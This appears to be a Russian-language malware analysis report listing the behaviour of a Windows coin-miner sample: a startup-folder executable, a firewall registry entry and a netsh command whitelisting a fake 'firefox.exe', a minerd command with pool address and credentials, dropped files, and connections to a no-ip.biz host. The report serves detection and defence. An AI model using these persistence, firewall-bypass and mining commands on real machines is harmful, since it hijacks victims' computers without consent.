Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\7d8ebea71b3de6e50aaec50cfc56a655.exe (каталог автозагрузки пользователя: помещённый сюда файл запускается при каждом входе в систему)
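- [<HKLM>\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List] '%APPDATA%\firefox.exe' = '%APPDATA%\firefox.exe:*:Enabled:firefox.exe' (запись вносит '%APPDATA%\firefox.exe' в список приложений, которым брандмауэр Windows разрешает сетевой доступ)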
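- '%TEMP%\Doge\minerd.exe' -o stratum+tcp://66.55.92.73:8000 -u 9ccdc8a6bc578bb4 -p 123 (запуск майнера minerd: -o задаёт адрес пула по протоколу Stratum, -u и -p — имя пользователя и пароль на пуле)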
- '%APPDATA%\firefox.exe'
- '<SYSTEM32>\Notbad.exe'
- '%PROGRAM_FILES%\WindowsApplication1.exe'
- '<SYSTEM32>\wbem\wmiadap.exe' /R /T
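- '<SYSTEM32>\netsh.exe' firewall add allowedprogram "%APPDATA%\firefox.exe" "firefox.exe" ENABLE (команда netsh добавляет '%APPDATA%\firefox.exe' в список программ, разрешённых брандмауэром Windows)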
- %TEMP%\Doge\libwinpthread-1.dll
- %TEMP%\Doge\libcurl-4.dll
- %TEMP%\Doge\minerd.exe
- %APPDATA%\firefox.exe
- %TEMP%\Doge\zlib1.dll
- %PROGRAM_FILES%\Sonera Corporative OU\Coin Miner\Uninstall.ini
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- <SYSTEM32>\Notbad.exe
- %PROGRAM_FILES%\Sonera Corporative OU\Coin Miner\Uninstall.exe
- %PROGRAM_FILES%\WindowsApplication1.exe
- <SYSTEM32>\wbem\Performance\WmiApRpl.ini
- <SYSTEM32>\PerfStringBackup.TMP
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- 'al####2.no-ip.biz':5552
- '66.#5.92.73':8000
- DNS ASK al####2.no-ip.biz
- ClassName: 'Shell_TrayWnd' WindowName: ''